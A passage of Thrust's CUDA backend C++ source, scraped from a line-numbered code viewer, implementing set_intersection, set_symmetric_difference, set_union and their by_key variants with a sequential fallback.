ItemsIt2 items2_first,
|
1432 |
-
ItemsIt2 items2_last,
|
1433 |
-
OutputIt result,
|
1434 |
-
CompareOp compare)
|
1435 |
-
{
|
1436 |
-
OutputIt ret = result;
|
1437 |
-
if (__THRUST_HAS_CUDART__)
|
1438 |
-
{
|
1439 |
-
typename thrust::iterator_value<ItemsIt1>::type *null_ = NULL;
|
1440 |
-
//
|
1441 |
-
ret = __set_operations::set_operations<thrust::detail::false_type>(
|
1442 |
-
policy,
|
1443 |
-
items1_first,
|
1444 |
-
items1_last,
|
1445 |
-
items2_first,
|
1446 |
-
items2_last,
|
1447 |
-
null_,
|
1448 |
-
null_,
|
1449 |
-
result,
|
1450 |
-
null_,
|
1451 |
-
compare,
|
1452 |
-
__set_operations::serial_set_intersection())
|
1453 |
-
.first;
|
1454 |
-
}
|
1455 |
-
else
|
1456 |
-
{
|
1457 |
-
#if !__THRUST_HAS_CUDART__
|
1458 |
-
ret = thrust::set_intersection(cvt_to_seq(derived_cast(policy)),
|
1459 |
-
items1_first,
|
1460 |
-
items1_last,
|
1461 |
-
items2_first,
|
1462 |
-
items2_last,
|
1463 |
-
result,
|
1464 |
-
compare);
|
1465 |
-
#endif
|
1466 |
-
}
|
1467 |
-
return ret;
|
1468 |
-
}
|
1469 |
-
|
1470 |
-
template <class Derived,
|
1471 |
-
class ItemsIt1,
|
1472 |
-
class ItemsIt2,
|
1473 |
-
class OutputIt>
|
1474 |
-
OutputIt __host__ __device__
|
1475 |
-
set_intersection(execution_policy<Derived> &policy,
|
1476 |
-
ItemsIt1 items1_first,
|
1477 |
-
ItemsIt1 items1_last,
|
1478 |
-
ItemsIt2 items2_first,
|
1479 |
-
ItemsIt2 items2_last,
|
1480 |
-
OutputIt result)
|
1481 |
-
{
|
1482 |
-
typedef typename thrust::iterator_value<ItemsIt1>::type value_type;
|
1483 |
-
return cuda_cub::set_intersection(policy,
|
1484 |
-
items1_first,
|
1485 |
-
items1_last,
|
1486 |
-
items2_first,
|
1487 |
-
items2_last,
|
1488 |
-
result,
|
1489 |
-
less<value_type>());
|
1490 |
-
}
|
1491 |
-
|
1492 |
-
|
1493 |
-
/*****************************/
|
1494 |
-
|
1495 |
-
__thrust_exec_check_disable__
|
1496 |
-
template <class Derived,
|
1497 |
-
class ItemsIt1,
|
1498 |
-
class ItemsIt2,
|
1499 |
-
class OutputIt,
|
1500 |
-
class CompareOp>
|
1501 |
-
OutputIt __host__ __device__
|
1502 |
-
set_symmetric_difference(execution_policy<Derived> &policy,
|
1503 |
-
ItemsIt1 items1_first,
|
1504 |
-
ItemsIt1 items1_last,
|
1505 |
-
ItemsIt2 items2_first,
|
1506 |
-
ItemsIt2 items2_last,
|
1507 |
-
OutputIt result,
|
1508 |
-
CompareOp compare)
|
1509 |
-
{
|
1510 |
-
OutputIt ret = result;
|
1511 |
-
if (__THRUST_HAS_CUDART__)
|
1512 |
-
{
|
1513 |
-
typename thrust::iterator_value<ItemsIt1>::type *null_ = NULL;
|
1514 |
-
//
|
1515 |
-
ret = __set_operations::set_operations<thrust::detail::false_type>(
|
1516 |
-
policy,
|
1517 |
-
items1_first,
|
1518 |
-
items1_last,
|
1519 |
-
items2_first,
|
1520 |
-
items2_last,
|
1521 |
-
null_,
|
1522 |
-
null_,
|
1523 |
-
result,
|
1524 |
-
null_,
|
1525 |
-
compare,
|
1526 |
-
__set_operations::serial_set_symmetric_difference())
|
1527 |
-
.first;
|
1528 |
-
}
|
1529 |
-
else
|
1530 |
-
{
|
1531 |
-
#if !__THRUST_HAS_CUDART__
|
1532 |
-
ret = thrust::set_symmetric_difference(cvt_to_seq(derived_cast(policy)),
|
1533 |
-
items1_first,
|
1534 |
-
items1_last,
|
1535 |
-
items2_first,
|
1536 |
-
items2_last,
|
1537 |
-
result,
|
1538 |
-
compare);
|
1539 |
-
#endif
|
1540 |
-
}
|
1541 |
-
return ret;
|
1542 |
-
}
|
1543 |
-
|
1544 |
-
|
1545 |
-
template <class Derived,
|
1546 |
-
class ItemsIt1,
|
1547 |
-
class ItemsIt2,
|
1548 |
-
class OutputIt>
|
1549 |
-
OutputIt __host__ __device__
|
1550 |
-
set_symmetric_difference(execution_policy<Derived> &policy,
|
1551 |
-
ItemsIt1 items1_first,
|
1552 |
-
ItemsIt1 items1_last,
|
1553 |
-
ItemsIt2 items2_first,
|
1554 |
-
ItemsIt2 items2_last,
|
1555 |
-
OutputIt result)
|
1556 |
-
{
|
1557 |
-
typedef typename thrust::iterator_value<ItemsIt1>::type value_type;
|
1558 |
-
return cuda_cub::set_symmetric_difference(policy,
|
1559 |
-
items1_first,
|
1560 |
-
items1_last,
|
1561 |
-
items2_first,
|
1562 |
-
items2_last,
|
1563 |
-
result,
|
1564 |
-
less<value_type>());
|
1565 |
-
}
|
1566 |
-
|
1567 |
-
/*****************************/
|
1568 |
-
|
1569 |
-
__thrust_exec_check_disable__
|
1570 |
-
template <class Derived,
|
1571 |
-
class ItemsIt1,
|
1572 |
-
class ItemsIt2,
|
1573 |
-
class OutputIt,
|
1574 |
-
class CompareOp>
|
1575 |
-
OutputIt __host__ __device__
|
1576 |
-
set_union(execution_policy<Derived> &policy,
|
1577 |
-
ItemsIt1 items1_first,
|
1578 |
-
ItemsIt1 items1_last,
|
1579 |
-
ItemsIt2 items2_first,
|
1580 |
-
ItemsIt2 items2_last,
|
1581 |
-
OutputIt result,
|
1582 |
-
CompareOp compare)
|
1583 |
-
{
|
1584 |
-
OutputIt ret = result;
|
1585 |
-
if (__THRUST_HAS_CUDART__)
|
1586 |
-
{
|
1587 |
-
typename thrust::iterator_value<ItemsIt1>::type *null_ = NULL;
|
1588 |
-
//
|
1589 |
-
ret = __set_operations::set_operations<thrust::detail::false_type>(
|
1590 |
-
policy,
|
1591 |
-
items1_first,
|
1592 |
-
items1_last,
|
1593 |
-
items2_first,
|
1594 |
-
items2_last,
|
1595 |
-
null_,
|
1596 |
-
null_,
|
1597 |
-
result,
|
1598 |
-
null_,
|
1599 |
-
compare,
|
1600 |
-
__set_operations::serial_set_union())
|
1601 |
-
.first;
|
1602 |
-
}
|
1603 |
-
else
|
1604 |
-
{
|
1605 |
-
#if !__THRUST_HAS_CUDART__
|
1606 |
-
ret = thrust::set_union(cvt_to_seq(derived_cast(policy)),
|
1607 |
-
items1_first,
|
1608 |
-
items1_last,
|
1609 |
-
items2_first,
|
1610 |
-
items2_last,
|
1611 |
-
result,
|
1612 |
-
compare);
|
1613 |
-
#endif
|
1614 |
-
}
|
1615 |
-
return ret;
|
1616 |
-
}
|
1617 |
-
|
1618 |
-
|
1619 |
-
template <class Derived,
|
1620 |
-
class ItemsIt1,
|
1621 |
-
class ItemsIt2,
|
1622 |
-
class OutputIt>
|
1623 |
-
OutputIt __host__ __device__
|
1624 |
-
set_union(execution_policy<Derived> &policy,
|
1625 |
-
ItemsIt1 items1_first,
|
1626 |
-
ItemsIt1 items1_last,
|
1627 |
-
ItemsIt2 items2_first,
|
1628 |
-
ItemsIt2 items2_last,
|
1629 |
-
OutputIt result)
|
1630 |
-
{
|
1631 |
-
typedef typename thrust::iterator_value<ItemsIt1>::type value_type;
|
1632 |
-
return cuda_cub::set_union(policy,
|
1633 |
-
items1_first,
|
1634 |
-
items1_last,
|
1635 |
-
items2_first,
|
1636 |
-
items2_last,
|
1637 |
-
result,
|
1638 |
-
less<value_type>());
|
1639 |
-
}
|
1640 |
-
|
1641 |
-
|
1642 |
-
/*****************************/
|
1643 |
-
/*****************************/
|
1644 |
-
/***** *_by_key *****/
|
1645 |
-
/*****************************/
|
1646 |
-
/*****************************/
|
1647 |
-
|
1648 |
-
/*****************************/
|
1649 |
-
|
1650 |
-
__thrust_exec_check_disable__
|
1651 |
-
template <class Derived,
|
1652 |
-
class KeysIt1,
|
1653 |
-
class KeysIt2,
|
1654 |
-
class ItemsIt1,
|
1655 |
-
class ItemsIt2,
|
1656 |
-
class KeysOutputIt,
|
1657 |
-
class ItemsOutputIt,
|
1658 |
-
class CompareOp>
|
1659 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1660 |
-
set_difference_by_key(execution_policy<Derived> &policy,
|
1661 |
-
KeysIt1 keys1_first,
|
1662 |
-
KeysIt1 keys1_last,
|
1663 |
-
KeysIt2 keys2_first,
|
1664 |
-
KeysIt2 keys2_last,
|
1665 |
-
ItemsIt1 items1_first,
|
1666 |
-
ItemsIt2 items2_first,
|
1667 |
-
KeysOutputIt keys_result,
|
1668 |
-
ItemsOutputIt items_result,
|
1669 |
-
CompareOp compare_op)
|
1670 |
-
{
|
1671 |
-
pair<KeysOutputIt, ItemsOutputIt> ret = thrust::make_pair(keys_result, items_result);
|
1672 |
-
if (__THRUST_HAS_CUDART__)
|
1673 |
-
{
|
1674 |
-
ret = __set_operations::set_operations<thrust::detail::true_type>(
|
1675 |
-
policy,
|
1676 |
-
keys1_first,
|
1677 |
-
keys1_last,
|
1678 |
-
keys2_first,
|
1679 |
-
keys2_last,
|
1680 |
-
items1_first,
|
1681 |
-
items2_first,
|
1682 |
-
keys_result,
|
1683 |
-
items_result,
|
1684 |
-
compare_op,
|
1685 |
-
__set_operations::serial_set_difference());
|
1686 |
-
}
|
1687 |
-
else
|
1688 |
-
{
|
1689 |
-
#if !__THRUST_HAS_CUDART__
|
1690 |
-
ret = thrust::set_difference_by_key(cvt_to_seq(derived_cast(policy)),
|
1691 |
-
keys1_first,
|
1692 |
-
keys1_last,
|
1693 |
-
keys2_first,
|
1694 |
-
keys2_last,
|
1695 |
-
items1_first,
|
1696 |
-
items2_first,
|
1697 |
-
keys_result,
|
1698 |
-
items_result,
|
1699 |
-
compare_op);
|
1700 |
-
#endif
|
1701 |
-
}
|
1702 |
-
return ret;
|
1703 |
-
}
|
1704 |
-
|
1705 |
-
template <class Derived,
|
1706 |
-
class KeysIt1,
|
1707 |
-
class KeysIt2,
|
1708 |
-
class ItemsIt1,
|
1709 |
-
class ItemsIt2,
|
1710 |
-
class KeysOutputIt,
|
1711 |
-
class ItemsOutputIt>
|
1712 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1713 |
-
set_difference_by_key(execution_policy<Derived> &policy,
|
1714 |
-
KeysIt1 keys1_first,
|
1715 |
-
KeysIt1 keys1_last,
|
1716 |
-
KeysIt2 keys2_first,
|
1717 |
-
KeysIt2 keys2_last,
|
1718 |
-
ItemsIt1 items1_first,
|
1719 |
-
ItemsIt2 items2_first,
|
1720 |
-
KeysOutputIt keys_result,
|
1721 |
-
ItemsOutputIt items_result)
|
1722 |
-
{
|
1723 |
-
typedef typename thrust::iterator_value<KeysIt1>::type value_type;
|
1724 |
-
return cuda_cub::set_difference_by_key(policy,
|
1725 |
-
keys1_first,
|
1726 |
-
keys1_last,
|
1727 |
-
keys2_first,
|
1728 |
-
keys2_last,
|
1729 |
-
items1_first,
|
1730 |
-
items2_first,
|
1731 |
-
keys_result,
|
1732 |
-
items_result,
|
1733 |
-
less<value_type>());
|
1734 |
-
}
|
1735 |
-
|
1736 |
-
/*****************************/
|
1737 |
-
|
1738 |
-
__thrust_exec_check_disable__
|
1739 |
-
template <class Derived,
|
1740 |
-
class KeysIt1,
|
1741 |
-
class KeysIt2,
|
1742 |
-
class ItemsIt1,
|
1743 |
-
class ItemsIt2,
|
1744 |
-
class KeysOutputIt,
|
1745 |
-
class ItemsOutputIt,
|
1746 |
-
class CompareOp>
|
1747 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1748 |
-
set_intersection_by_key(execution_policy<Derived> &policy,
|
1749 |
-
KeysIt1 keys1_first,
|
1750 |
-
KeysIt1 keys1_last,
|
1751 |
-
KeysIt2 keys2_first,
|
1752 |
-
KeysIt2 keys2_last,
|
1753 |
-
ItemsIt1 items1_first,
|
1754 |
-
KeysOutputIt keys_result,
|
1755 |
-
ItemsOutputIt items_result,
|
1756 |
-
CompareOp compare_op)
|
1757 |
-
{
|
1758 |
-
pair<KeysOutputIt, ItemsOutputIt> ret = thrust::make_pair(keys_result, items_result);
|
1759 |
-
if (__THRUST_HAS_CUDART__)
|
1760 |
-
{
|
1761 |
-
ret = __set_operations::set_operations<thrust::detail::true_type>(
|
1762 |
-
policy,
|
1763 |
-
keys1_first,
|
1764 |
-
keys1_last,
|
1765 |
-
keys2_first,
|
1766 |
-
keys2_last,
|
1767 |
-
items1_first,
|
1768 |
-
items1_first,
|
1769 |
-
keys_result,
|
1770 |
-
items_result,
|
1771 |
-
compare_op,
|
1772 |
-
__set_operations::serial_set_intersection());
|
1773 |
-
}
|
1774 |
-
else
|
1775 |
-
{
|
1776 |
-
#if !__THRUST_HAS_CUDART__
|
1777 |
-
ret = thrust::set_intersection_by_key(cvt_to_seq(derived_cast(policy)),
|
1778 |
-
keys1_first,
|
1779 |
-
keys1_last,
|
1780 |
-
keys2_first,
|
1781 |
-
keys2_last,
|
1782 |
-
items1_first,
|
1783 |
-
keys_result,
|
1784 |
-
items_result,
|
1785 |
-
compare_op);
|
1786 |
-
#endif
|
1787 |
-
}
|
1788 |
-
return ret;
|
1789 |
-
}
|
1790 |
-
|
1791 |
-
template <class Derived,
|
1792 |
-
class KeysIt1,
|
1793 |
-
class KeysIt2,
|
1794 |
-
class ItemsIt1,
|
1795 |
-
class ItemsIt2,
|
1796 |
-
class KeysOutputIt,
|
1797 |
-
class ItemsOutputIt>
|
1798 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1799 |
-
set_intersection_by_key(execution_policy<Derived> &policy,
|
1800 |
-
KeysIt1 keys1_first,
|
1801 |
-
KeysIt1 keys1_last,
|
1802 |
-
KeysIt2 keys2_first,
|
1803 |
-
KeysIt2 keys2_last,
|
1804 |
-
ItemsIt1 items1_first,
|
1805 |
-
KeysOutputIt keys_result,
|
1806 |
-
ItemsOutputIt items_result)
|
1807 |
-
{
|
1808 |
-
typedef typename thrust::iterator_value<KeysIt1>::type value_type;
|
1809 |
-
return cuda_cub::set_intersection_by_key(policy,
|
1810 |
-
keys1_first,
|
1811 |
-
keys1_last,
|
1812 |
-
keys2_first,
|
1813 |
-
keys2_last,
|
1814 |
-
items1_first,
|
1815 |
-
keys_result,
|
1816 |
-
items_result,
|
1817 |
-
less<value_type>());
|
1818 |
-
}
|
1819 |
-
|
1820 |
-
/*****************************/
|
1821 |
-
|
1822 |
-
__thrust_exec_check_disable__
|
1823 |
-
template <class Derived,
|
1824 |
-
class KeysIt1,
|
1825 |
-
class KeysIt2,
|
1826 |
-
class ItemsIt1,
|
1827 |
-
class ItemsIt2,
|
1828 |
-
class KeysOutputIt,
|
1829 |
-
class ItemsOutputIt,
|
1830 |
-
class CompareOp>
|
1831 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1832 |
-
set_symmetric_difference_by_key(execution_policy<Derived> &policy,
|
1833 |
-
KeysIt1 keys1_first,
|
1834 |
-
KeysIt1 keys1_last,
|
1835 |
-
KeysIt2 keys2_first,
|
1836 |
-
KeysIt2 keys2_last,
|
1837 |
-
ItemsIt1 items1_first,
|
1838 |
-
ItemsIt2 items2_first,
|
1839 |
-
KeysOutputIt keys_result,
|
1840 |
-
ItemsOutputIt items_result,
|
1841 |
-
CompareOp compare_op)
|
1842 |
-
{
|
1843 |
-
pair<KeysOutputIt, ItemsOutputIt> ret = thrust::make_pair(keys_result, items_result);
|
1844 |
-
if (__THRUST_HAS_CUDART__)
|
1845 |
-
{
|
1846 |
-
ret = __set_operations::set_operations<thrust::detail::true_type>(
|
1847 |
-
policy,
|
1848 |
-
keys1_first,
|
1849 |
-
keys1_last,
|
1850 |
-
keys2_first,
|
1851 |
-
keys2_last,
|
1852 |
-
items1_first,
|
1853 |
-
items2_first,
|
1854 |
-
keys_result,
|
1855 |
-
items_result,
|
1856 |
-
compare_op,
|
1857 |
-
__set_operations::serial_set_symmetric_difference());
|
1858 |
-
}
|
1859 |
-
else
|
1860 |
-
{
|
1861 |
-
#if !__THRUST_HAS_CUDART__
|
1862 |
-
ret = thrust::set_symmetric_difference_by_key(cvt_to_seq(derived_cast(policy)),
|
1863 |
-
keys1_first,
|
1864 |
-
keys1_last,
|
1865 |
-
keys2_first,
|
1866 |
-
keys2_last,
|
1867 |
-
items1_first,
|
1868 |
-
items2_first,
|
1869 |
-
keys_result,
|
1870 |
-
items_result,
|
1871 |
-
compare_op);
|
1872 |
-
#endif
|
1873 |
-
}
|
1874 |
-
return ret;
|
1875 |
-
}
|
1876 |
-
|
1877 |
-
template <class Derived,
|
1878 |
-
class KeysIt1,
|
1879 |
-
class KeysIt2,
|
1880 |
-
class ItemsIt1,
|
1881 |
-
class ItemsIt2,
|
1882 |
-
class KeysOutputIt,
|
1883 |
-
class ItemsOutputIt>
|
1884 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1885 |
-
set_symmetric_difference_by_key(execution_policy<Derived> &policy,
|
1886 |
-
KeysIt1 keys1_first,
|
1887 |
-
KeysIt1 keys1_last,
|
1888 |
-
KeysIt2 keys2_first,
|
1889 |
-
KeysIt2 keys2_last,
|
1890 |
-
ItemsIt1 items1_first,
|
1891 |
-
ItemsIt2 items2_first,
|
1892 |
-
KeysOutputIt keys_result,
|
1893 |
-
ItemsOutputIt items_result)
|
1894 |
-
{
|
1895 |
-
typedef typename thrust::iterator_value<KeysIt1>::type value_type;
|
1896 |
-
return cuda_cub::set_symmetric_difference_by_key(policy,
|
1897 |
-
keys1_first,
|
1898 |
-
keys1_last,
|
1899 |
-
keys2_first,
|
1900 |
-
keys2_last,
|
1901 |
-
items1_first,
|
1902 |
-
items2_first,
|
1903 |
-
keys_result,
|
1904 |
-
items_result,
|
1905 |
-
less<value_type>());
|
1906 |
-
}
|
1907 |
-
|
1908 |
-
/*****************************/
|
1909 |
-
|
1910 |
-
__thrust_exec_check_disable__
|
1911 |
-
template <class Derived,
|
1912 |
-
class KeysIt1,
|
1913 |
-
class KeysIt2,
|
1914 |
-
class ItemsIt1,
|
1915 |
-
class ItemsIt2,
|
1916 |
-
class KeysOutputIt,
|
1917 |
-
class ItemsOutputIt,
|
1918 |
-
class CompareOp>
|
1919 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1920 |
-
set_union_by_key(execution_policy<Derived> &policy,
|
1921 |
-
KeysIt1 keys1_first,
|
1922 |
-
KeysIt1 keys1_last,
|
1923 |
-
KeysIt2 keys2_first,
|
1924 |
-
KeysIt2 keys2_last,
|
1925 |
-
ItemsIt1 items1_first,
|
1926 |
-
ItemsIt2 items2_first,
|
1927 |
-
KeysOutputIt keys_result,
|
1928 |
-
ItemsOutputIt items_result,
|
1929 |
-
CompareOp compare_op)
|
1930 |
-
{
|
1931 |
-
pair<KeysOutputIt, ItemsOutputIt> ret = thrust::make_pair(keys_result, items_result);
|
1932 |
-
if (__THRUST_HAS_CUDART__)
|
1933 |
-
{
|
1934 |
-
ret = __set_operations::set_operations<thrust::detail::true_type>(
|
1935 |
-
policy,
|
1936 |
-
keys1_first,
|
1937 |
-
keys1_last,
|
1938 |
-
keys2_first,
|
1939 |
-
keys2_last,
|
1940 |
-
items1_first,
|
1941 |
-
items2_first,
|
1942 |
-
keys_result,
|
1943 |
-
items_result,
|
1944 |
-
compare_op,
|
1945 |
-
__set_operations::serial_set_union());
|
1946 |
-
}
|
1947 |
-
else
|
1948 |
-
{
|
1949 |
-
#if !__THRUST_HAS_CUDART__
|
1950 |
-
ret = thrust::set_union_by_key(cvt_to_seq(derived_cast(policy)),
|
1951 |
-
keys1_first,
|
1952 |
-
keys1_last,
|
1953 |
-
keys2_first,
|
1954 |
-
keys2_last,
|
1955 |
-
items1_first,
|
1956 |
-
items2_first,
|
1957 |
-
keys_result,
|
1958 |
-
items_result,
|
1959 |
-
compare_op);
|
1960 |
-
#endif
|
1961 |
-
}
|
1962 |
-
return ret;
|
1963 |
-
}
|
1964 |
-
|
1965 |
-
template <class Derived,
|
1966 |
-
class KeysIt1,
|
1967 |
-
class KeysIt2,
|
1968 |
-
class ItemsIt1,
|
1969 |
-
class ItemsIt2,
|
1970 |
-
class KeysOutputIt,
|
1971 |
-
class ItemsOutputIt>
|
1972 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1973 |
-
set_union_by_key(execution_policy<Derived> &policy,
|
1974 |
-
KeysIt1 keys1_first,
|
1975 |
-
KeysIt1 keys1_last,
|
1976 |
-
KeysIt2 keys2_first,
|
1977 |
-
KeysIt2 keys2_last,
|
1978 |
-
ItemsIt1 items1_first,
|
1979 |
-
ItemsIt2 items2_first,
|
1980 |
-
KeysOutputIt keys_result,
|
1981 |
-
ItemsOutputIt items_result)
|
1982 |
-
{
|
1983 |
-
typedef typename thrust::iterator_value<KeysIt1>::type value_type;
|
1984 |
-
return cuda_cub::set_union_by_key(policy,
|
1985 |
-
keys1_first,
|
1986 |
-
keys1_last,
|
1987 |
-
keys2_first,
|
1988 |
-
keys2_last,
|
1989 |
-
items1_first,
|
1990 |
-
items2_first,
|
1991 |
-
keys_result,
|
1992 |
-
items_result,
|
1993 |
-
less<value_type>());
|
1994 |
-
}
|
1995 |
-
|
1996 |
-
} // namespace cuda_cub
|
1997 |
-
} // end namespace thrust
|
1998 |
-
#endif
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
